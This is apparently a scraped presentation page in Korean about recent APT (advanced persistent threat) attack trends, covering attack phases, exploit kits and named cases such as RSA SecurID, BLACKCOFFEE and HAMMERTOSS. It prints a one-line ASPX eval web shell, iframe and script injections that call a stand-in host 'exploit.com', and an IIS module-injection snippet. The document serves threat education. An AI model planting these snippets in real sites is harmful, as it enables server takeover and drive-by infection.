보안 위협과 악성코드 분석 기법보안 위협과 악성코드 분석 기법
보안 위협과 악성코드 분석 기법
 
(141031) #fitalk plaso 슈퍼 타임라인 분석 도구 활용 방안
(141031) #fitalk plaso 슈퍼 타임라인 분석 도구 활용 방안(141031) #fitalk plaso 슈퍼 타임라인 분석 도구 활용 방안
(141031) #fitalk plaso 슈퍼 타임라인 분석 도구 활용 방안
 
Volatility를 이용한 memory forensics
Volatility를 이용한 memory forensicsVolatility를 이용한 memory forensics
Volatility를 이용한 memory forensics
 
2010년 상반기 보안 위협 동향과 주요 보안 위협
2010년 상반기 보안 위협 동향과 주요 보안 위협2010년 상반기 보안 위협 동향과 주요 보안 위협
2010년 상반기 보안 위협 동향과 주요 보안 위협
 
SNS 보안 위협 사례
SNS 보안 위협 사례SNS 보안 위협 사례
SNS 보안 위협 사례
 
(Fios#03) 4. 파워셸 포렌식 조사 기법
(Fios#03) 4. 파워셸 포렌식 조사 기법(Fios#03) 4. 파워셸 포렌식 조사 기법
(Fios#03) 4. 파워셸 포렌식 조사 기법
 
보안 위협 동향과 대응 방안
보안 위협 동향과 대응 방안보안 위협 동향과 대응 방안
보안 위협 동향과 대응 방안
 
(150124) #fitalk advanced $usn jrnl forensics (english)
(150124) #fitalk advanced $usn jrnl forensics (english)(150124) #fitalk advanced $usn jrnl forensics (english)
(150124) #fitalk advanced $usn jrnl forensics (english)
 

Ähnlich wie 지능형지속위협공격 최신동향 분석

보안 위협과 악성코드 분석 기법
보안 위협과 악성코드 분석 기법보안 위협과 악성코드 분석 기법
보안 위협과 악성코드 분석 기법Youngjun Chang
 
보안 위협과 악성코드 분석 기법
보안 위협과 악성코드 분석 기법보안 위협과 악성코드 분석 기법
보안 위협과 악성코드 분석 기법Youngjun Chang
 
보안 위협 형태와 악성코드 분석 기법
보안 위협 형태와 악성코드 분석 기법보안 위협 형태와 악성코드 분석 기법
보안 위협 형태와 악성코드 분석 기법Youngjun Chang
 
보안 위협 동향과 대응 방안
보안 위협 동향과 대응 방안보안 위협 동향과 대응 방안
보안 위협 동향과 대응 방안Youngjun Chang
 
[KCC poster]정준영
[KCC poster]정준영[KCC poster]정준영
[KCC poster]정준영Junyoung Jung
 
(Ficon2016) #2 침해사고 대응, 이렇다고 전해라
(Ficon2016) #2 침해사고 대응, 이렇다고 전해라(Ficon2016) #2 침해사고 대응, 이렇다고 전해라
(Ficon2016) #2 침해사고 대응, 이렇다고 전해라INSIGHT FORENSIC
 
악성코드와 분석 방법
악성코드와 분석 방법악성코드와 분석 방법
악성코드와 분석 방법Youngjun Chang
 
2014 키보드보안솔루션 시온
2014 키보드보안솔루션 시온2014 키보드보안솔루션 시온
2014 키보드보안솔루션 시온시온시큐리티
 
랜섬웨어 vs 윈도우 10
랜섬웨어 vs 윈도우 10랜섬웨어 vs 윈도우 10
랜섬웨어 vs 윈도우 10Sik Kim
 
[네이버D2SF] 안전한 서비스 운영을 위한 Ncloud 보안교육
[네이버D2SF] 안전한 서비스 운영을 위한 Ncloud 보안교육[네이버D2SF] 안전한 서비스 운영을 위한 Ncloud 보안교육
[네이버D2SF] 안전한 서비스 운영을 위한 Ncloud 보안교육NAVER D2 STARTUP FACTORY
 
16.02.27 해킹캠프 오픈 소스 최우석
16.02.27 해킹캠프 오픈 소스 최우석16.02.27 해킹캠프 오픈 소스 최우석
16.02.27 해킹캠프 오픈 소스 최우석KISEC
 
16.02.27 해킹캠프 오픈_소스_최우석_ver0.3
16.02.27 해킹캠프 오픈_소스_최우석_ver0.316.02.27 해킹캠프 오픈_소스_최우석_ver0.3
16.02.27 해킹캠프 오픈_소스_최우석_ver0.3KISEC
 
악성 코드와 보안 위협 동향
악성 코드와 보안 위협 동향악성 코드와 보안 위협 동향
악성 코드와 보안 위협 동향Youngjun Chang
 
[2013 CodeEngn Conference 09] proneer - Malware Tracker
[2013 CodeEngn Conference 09] proneer - Malware Tracker[2013 CodeEngn Conference 09] proneer - Malware Tracker
[2013 CodeEngn Conference 09] proneer - Malware TrackerGangSeok Lee
 
악성코드와 분석 방안
악성코드와 분석 방안악성코드와 분석 방안
악성코드와 분석 방안Youngjun Chang
 
Drive-By Download & JavaScript Obfuscation
Drive-By Download & JavaScript ObfuscationDrive-By Download & JavaScript Obfuscation
Drive-By Download & JavaScript ObfuscationJason Choi
 
Project turtle ship
Project turtle shipProject turtle ship
Project turtle shiphanbeom Park
 
소포스 인터셉트 엑스 소개 (Sophos Intercept X)
소포스 인터셉트 엑스 소개 (Sophos Intercept X)소포스 인터셉트 엑스 소개 (Sophos Intercept X)
소포스 인터셉트 엑스 소개 (Sophos Intercept X)Gunjung Lee
 
악성코드와 기업의 악성코드 대응
악성코드와 기업의 악성코드 대응악성코드와 기업의 악성코드 대응
악성코드와 기업의 악성코드 대응Youngjun Chang
 

Ähnlich wie 지능형지속위협공격 최신동향 분석 (20)

보안 위협과 악성코드 분석 기법
보안 위협과 악성코드 분석 기법보안 위협과 악성코드 분석 기법
보안 위협과 악성코드 분석 기법
 
보안 위협과 악성코드 분석 기법
보안 위협과 악성코드 분석 기법보안 위협과 악성코드 분석 기법
보안 위협과 악성코드 분석 기법
 
보안 위협 형태와 악성코드 분석 기법
보안 위협 형태와 악성코드 분석 기법보안 위협 형태와 악성코드 분석 기법
보안 위협 형태와 악성코드 분석 기법
 
보안 위협 동향과 대응 방안
보안 위협 동향과 대응 방안보안 위협 동향과 대응 방안
보안 위협 동향과 대응 방안
 
[KCC poster]정준영
[KCC poster]정준영[KCC poster]정준영
[KCC poster]정준영
 
(Ficon2016) #2 침해사고 대응, 이렇다고 전해라
(Ficon2016) #2 침해사고 대응, 이렇다고 전해라(Ficon2016) #2 침해사고 대응, 이렇다고 전해라
(Ficon2016) #2 침해사고 대응, 이렇다고 전해라
 
악성코드와 분석 방법
악성코드와 분석 방법악성코드와 분석 방법
악성코드와 분석 방법
 
2014 키보드보안솔루션 시온
2014 키보드보안솔루션 시온2014 키보드보안솔루션 시온
2014 키보드보안솔루션 시온
 
랜섬웨어 vs 윈도우 10
랜섬웨어 vs 윈도우 10랜섬웨어 vs 윈도우 10
랜섬웨어 vs 윈도우 10
 
[네이버D2SF] 안전한 서비스 운영을 위한 Ncloud 보안교육
[네이버D2SF] 안전한 서비스 운영을 위한 Ncloud 보안교육[네이버D2SF] 안전한 서비스 운영을 위한 Ncloud 보안교육
[네이버D2SF] 안전한 서비스 운영을 위한 Ncloud 보안교육
 
Shadow wall utm
Shadow wall utmShadow wall utm
Shadow wall utm
 
16.02.27 해킹캠프 오픈 소스 최우석
16.02.27 해킹캠프 오픈 소스 최우석16.02.27 해킹캠프 오픈 소스 최우석
16.02.27 해킹캠프 오픈 소스 최우석
 
16.02.27 해킹캠프 오픈_소스_최우석_ver0.3
16.02.27 해킹캠프 오픈_소스_최우석_ver0.316.02.27 해킹캠프 오픈_소스_최우석_ver0.3
16.02.27 해킹캠프 오픈_소스_최우석_ver0.3
 
악성 코드와 보안 위협 동향
악성 코드와 보안 위협 동향악성 코드와 보안 위협 동향
악성 코드와 보안 위협 동향
 
[2013 CodeEngn Conference 09] proneer - Malware Tracker
[2013 CodeEngn Conference 09] proneer - Malware Tracker[2013 CodeEngn Conference 09] proneer - Malware Tracker
[2013 CodeEngn Conference 09] proneer - Malware Tracker
 
악성코드와 분석 방안
악성코드와 분석 방안악성코드와 분석 방안
악성코드와 분석 방안
 
Drive-By Download & JavaScript Obfuscation
Drive-By Download & JavaScript ObfuscationDrive-By Download & JavaScript Obfuscation
Drive-By Download & JavaScript Obfuscation
 
Project turtle ship
Project turtle shipProject turtle ship
Project turtle ship
 
소포스 인터셉트 엑스 소개 (Sophos Intercept X)
소포스 인터셉트 엑스 소개 (Sophos Intercept X)소포스 인터셉트 엑스 소개 (Sophos Intercept X)
소포스 인터셉트 엑스 소개 (Sophos Intercept X)
 
악성코드와 기업의 악성코드 대응
악성코드와 기업의 악성코드 대응악성코드와 기업의 악성코드 대응
악성코드와 기업의 악성코드 대응
 

지능형지속위협공격 최신동향 분석

  • 1. 지능형 지속 위협 최신동향 분석 주한익 코어시큐리티 교육사업부/보안기술연구팀 joohanik@coresec.co.kr
  • 2. APT(지능형 지속 위협) 용어에 대한 밴더들의 정의 . Drive-By Downloads, SQL Injection, SpyWare, Phishing, Spam 등의 다양한 기술을 이용한 타겟팅 공격 . 특정 대상의 기밀정보 탈취 혹은 정치적 목적을 위해 최신의 복합적인 공격 기법을 사용하는 형태의 공격 . 즉각적인 금전적 이득이 아닌 중요한 정보를 탈취하는 것을 목표로 하여 장기간동안 은밀하게 수행하는 공격 . 장기간에 걸쳐 목표 조직 혹은 사용자의 중요한 자산을 탈취하는데 목표를 두고 수행되는 공격
 . 탐지 회피 기술을 사용하며 공격받고 있다는 사실을 숨기며, 장기간에 걸쳐서 피해를 주는 형태의 공격 . 장기간에 걸쳐 미리 정해진 특정 목표에 대해 위협을 가하는 공격
  • 3. 기존 APT(기능형 지속 위협 공격)의 절차 및 시나리오 예 Incursion Discovery Capture Exfiltration Phase 1 Phase 2 Phase 3 Phase 4 세부 특징 Reconnaissance Social engineering Zero-day vulnerability Manual operations 관련 스킬셋 웹 사이트 서핑 구글링 SNS 조사 웹 사이트 취약점 공격 시스템 취약점 공격 스피어 피싱 (링크/문서파일첨부 메일) 저장매체를 이용한 악성코드 유입 워터링 홀 DEMO Step1. 공격자는 웹사이트의 취약점 공격 (웹쉘 취약점을 이용한 서버 시스템 제어권한 탈취) Step2. 공격자는 제어권한을 획득한 웹서버에 악성코드 삽입 (랜딩 페이지로 유도하는 iframe 삽입) Step3. 사용자는 공격당한 웹 사이트에 방문하게 되고 악성 프레임에 의해 익스플로잇킷의 랜딩 페이지를 
 로딩함 (랜딩 페이지는 사용자의 운영체제와 브라우저, 플러그인의 종류, 사용언어, 과거 방문여부
 등을 검사) 드라이브 바이 다운로드
  • 4. 기존 APT(기능형 지속 위협 공격)의 절차 및 시나리오 예 침해당한 웹서버 <iframe src=http://exploit.com/land.html .. <script src=http://exploit.com/mal.js .. 익스플로잇킷 서버 랜딩페이지 익스플로잇#2익스플로잇#1 익스플로잇#N •브라우저와 운영체제의 이름, 버전 체크 •설치된 브라우저 플러그인과 버전을 확인하여 
 취약 여부 확인 •취약점을 공격하는 익스플로잇 페이지로 유도 사용자 PC Step1. 웹쉘 업로드 Step2. 악성 프레임/스크립트 삽입 엔터프라이즈 네트워크 인프라 Step3-1. 웹 사이트 방문 공격자 & C2 Step3-2. 랜딩 페이지 로딩 Step3-3. 웹 브라우저 플러그인
 익스플로잇 유입 Step3-3. 악성코드 감염 데이터베이스 서버
  • 5. 기존 APT(기능형 지속 위협 공격)의 절차 및 시나리오 예 Incursion Discovery Capture Exfiltration Phase 1 Phase 2 Phase 3 Phase 4 세부 특징 Multiple vectors Run silent, run deep Research and analysis 관련 스킬셋 DEMO 추가 악성코드 다운로드 탐지 우회를 위한 스파게티 코드 서비스 취약점 스캐닝 운영체제 및 서비스 버전 파악 네트워크 구조 파악 Step4. 공격자는 네트워크 악성코드를 추가로 다운로드 하여 목표의 네트워크 정보를 수집함 (추가 악성코드 다운로드, 네트워크 구조 파악) 키로깅을 통한 계정정보 탈취 Step5. 사용자가 입력하는 키스트로크 정보를 로깅하여 데이터베이스 서버의 계정 정보를 수집함 (키로깅을 통한 계정정보 탈취)
  • 6. 기존 APT(기능형 지속 위협 공격)의 절차 및 시나리오 예 침해당한 웹서버 익스플로잇킷 서버 랜딩페이지 익스플로잇#2익스플로잇#1 익스플로잇#N •브라우저와 운영체제의 이름, 버전 체크 •설치된 브라우저 플러그인과 버전을 확인하여 
 취약 여부 확인 •취약점을 공격하는 익스플로잇 페이지로 유도 사용자 PC 공격자 & C2 Step 4-1. 추가 악성코드 유입 엔터프라이즈 네트워크 인프라 데이터베이스 서버 Step 4-2. 내부 네트워크 정보 수집 Step 5. 키로깅 <iframe src=http://exploit.com/land.html .. <script src=http://exploit.com/mal.js ..
  • 7. 기존 APT(기능형 지속 위협 공격)의 절차 및 시나리오 예 Incursion Discovery Capture Exfiltration Phase 1 Phase 2 Phase 3 Phase 4 세부 특징 Long-term occupancy Control 관련 스킬셋 DEMO 데이터베이스 정보 접근 루트킷 설치를 통한 은닉 시스템 파괴시스템 재부팅 Step6. 공격자는 보안 솔루션의 탐지 우회를 우회 터널링 및 포트 포워딩을 수행함 (암호화 통신) 암호화 통신 Step7. 공격자는 암호화된 채널을 통해 데이터베이스 서버에 접근함 (데이터베이스 정보 접근)
  • 8. 기존 APT(기능형 지속 위협 공격)의 절차 및 시나리오 예 침해당한 웹서버 익스플로잇킷 서버 랜딩페이지 익스플로잇#2익스플로잇#1 익스플로잇#N •브라우저와 운영체제의 이름, 버전 체크 •설치된 브라우저 플러그인과 버전을 확인하여 
 취약 여부 확인 •취약점을 공격하는 익스플로잇 페이지로 유도 사용자 PC 공격자 & C2 Step 6. 터널링 및 포트포워딩 엔터프라이즈 네트워크 인프라 데이터베이스 서버 <iframe src=http://exploit.com/land.html .. <script src=http://exploit.com/mal.js .. Step 7. 데이터베이스 접근
  • 9. 기존 APT(기능형 지속 위협 공격)의 절차 및 시나리오 예 Incursion Discovery Capture Exfiltration Phase 1 Phase 2 Phase 3 Phase 4 세부 특징 Data transmission Ongoing analysis 스킬셋 DEMO 탈취한 개인정보 판매 수집한 데이터 패킹 및 암호화 압축 탈취한 데이터 전송 Step8. 공격자는 탈취한 데이터베이스 정보를 ZIP 파일로 암호화 압축함 (수집한 데이터 패킹 및 암호화 압축) Step9. ZIP 파일을 암호화된 채널을 통해 공격자에게 전송함 (탈취한 데이터 전송)
  • 10. 기존 APT(기능형 지속 위협 공격)의 절차 및 시나리오 예 침해당한 웹서버 익스플로잇킷 서버 랜딩페이지 익스플로잇#2익스플로잇#1 익스플로잇#N •브라우저와 운영체제의 이름, 버전 체크 •설치된 브라우저 플러그인과 버전을 확인하여 
 취약 여부 확인 •취약점을 공격하는 익스플로잇 페이지로 유도 사용자 PC 공격자 & C2 Step 9. 압축된 데이터베이스 
 파일 전송 <iframe src=http://exploit.com/land.html .. <script src=http://exploit.com/mal.js .. Step 8. 데이터베이스 정보
 수집 및 압축 엔터프라이즈 네트워크 인프라 데이터베이스 서버 익스플로잇#2익스플로잇#1 익스플로잇#N
  • 11. 2014~2015년도 APT(지능형 지속 위협)에서 사용되는 스킬셋의 변화 침해당한 웹서버 익스플로잇킷 서버 랜딩페이지 익스플로잇#2익스플로잇#1 익스플로잇#N •브라우저와 운영체제의 이름, 버전 체크 •설치된 브라우저 플러그인과 버전을 확인하여 
 취약 여부 확인 •취약점을 공격하는 익스플로잇 페이지로 유도 사용자 PC 공격자 & C2 데이터베이스 서버 •단일라인 웹쉘 사용 <%@ Page Language="Jscript"%>
 <%eval(Request.Item["p1"],"unsafe");%> •센서 우회를 위한 SSL 통신 사용 •IIS의 web.config 조작을 통한 악성 DLL 모듈 삽입 <modules>
 <add type="Microsoft.Exchange.Clients.Bad
 Module" name="BadModule" />
 </modules> •VPN을 이용한 조직의 
 네트워크 인프라 진입 엔터프라이즈 네트워크 인프라 •WMI/파워쉘 기반 백도어 삽입
 (objects.data 데이터베이스 파일) •소스코드가 수정된 Mimikatz를 
 이용한 메모리상 패스워드 수집 •난독화, 코드조작 예방을 위한 무결성 검사 기능 추가 •가상머신 탐지기능 추가 •공격에 사용되는 서버시스템의 도메인쉐도잉(Domain Shadowing)
  • 12. 2014~2015년도 APT(지능형 지속 위협)에서 사용되는 스킬셋의 변화 M-Trend 2015: A VIEW FROM THE FRONT LINES
  • 13. VPN Hijacking : RSA Security "Secure ID" Hacking 사례 RSA Security 마이크로소프트 오피스 엑셀 파일이 첨부된 스피어 피싱 메일 발송 사용자 PC 사용자가 엑셀 파일을 실행함 트로이안 유형의 악성코드 감염 "Secure ID" 서버 RSA Security 내부 네트워크 OTP 생성 알고리즘, Initial Value, 사용자(고객) 내역등의 정보 접근 및 탈취 - "Secure ID"는 RSA Security의 OTP(One Time Password) - 포준 500대 기업의 75% 이상이 사용하고 있음 - 전 세계 1500만명 이상이 사용하는 대표적 OTP "Poison Ivy RAT"를 이용한 원격 제어 직원용 VPN 네트워크를 이용하여 록히드 마틴의 내부 네트워크 접근 "Secure ID" 사용 고객 "Secure ID" 사용 고객 "Secure ID" 사용 고객 탈취한 OTP 정보를 이용하여 접근 및 공격시도 F22등을 생산하는 전세계 최고의 방위 산업체 미 국방부에 통신, 정보, 정탐 및 정찰 등의 장비와 서비스를 공급하는 업체 항공우주 방위산업체
  • 14. 2014~2015년도 APT(지능형지속위협)의 특징 : 익스플로잇 킷의 신속한 모듈 업데이트 특징1. 패치가 발표되자마자 해당 취약점에 대한 익스플로잇 모듈 적용 패치된 취약점도 익스플로잇 킷(e.g. 앵글러, 뉴클리어)의 공격모듈로 빈번하게 사용됨 패치 업데이트를 제때 적용하기 어려운 경우 생기는 패치허점(Patching Gap)을 악용 출처 : Cisco 2015 - Midyear Security Report
  • 15. 2014~2015년도 APT(지능형지속위협)의 특징 : APT17 - BLACKCOFFEE 사례 특징2. SNS 및 포럼 쓰레드등을 이용한 명령체계 마이크로소프트 테크넷 포럼 쓰래드 @MICROSOFT<eight-character string with two characters per octet>CORPORATION 특정 문자열 패턴으로 구성된 
 인코딩된 C2 IP 주소 BLACKCOFEE 악성
 코드에 감염된 사용자 BLACKCOFFEE는 주기적으로 페이지를 검사하여 인코딩된 C2 IP 
 주소가 담겨진 문자열을 찾으며, 해당 문자열을 가져온 후 디코딩 BLACKCOFFEE
 C2 서버 BLACKCOFFEE는 리버스 쉘, 파일 업로드/
 다운로드, 파일 이름조작/이동/삭제, 프로세스 종료
 등의 기능을 포함하여 약 15개의 명령체계를 가짐
 미국의 정부기관, 방위산업체, 로펌, 정보보안 
 업체등에 속한 사용자를 주요 타겟으로 함

  • 16. 2014~2015년도 APT(지능형지속위협)의 특징 : APT29 - HAMMERTOSS 사례 특징2. SNS 및 포럼 쓰레드를 이용한 명령체계 트위터 핸들 
 (사용자의 ID와 연관된 트위터 웹 사이트) Step2 •HAMMERTOSS는 특정 날짜에 특정 트위터 핸들을 방문하도록 하는
 알고리즘을 가지고 있음 •날짜와 계정이름을 조합하여 방문할 URL 패턴을 생성하며, 주기적으로 
 변하므로 패턴을 특정하기 어려움 (e.g. https://www.twitter.com/abBob52b/) Bobby @abBob52b Step1. APT29에 속한 공격자는 지정한 날짜에 트위터 핸들을 등록
 (사용되는 핸들의 URL은 악성코드의 알고리즘과 동일하게 생성) HAMMERTOSS 악성
 코드에 감염된 사용자 Follow doctorhandbook.com#101docto •암호화된 이미지파일을 보관하고 있는 서버 URL •이미지파일 내의 암호화된 명령 문자열 옵셋과 복호에
 사용되는 문자열 doctorhandbook.com Step3. 이미지파일을 캐쉬 디렉토리에 다운로드한 후
 파일내의 데이터 복호화 및 명령 획득
 (복호된 데이터는 파워쉘 명령을 포함) 수집한 정보를 저장하는 클라우드 Step4. 명령실행 후 수집한 정보를 
 클라우드에 업로드 옵셋 101에서 암호화된 
 데이터 획득 Step5. 정보 수집
  • 17. 2014~2015년도 APT(지능형지속위협)의 특징 : The Inception-Framework 사례 특징3. 클라우드 스토리지를 이용한 모듈 업데이트, 홈라우터 악용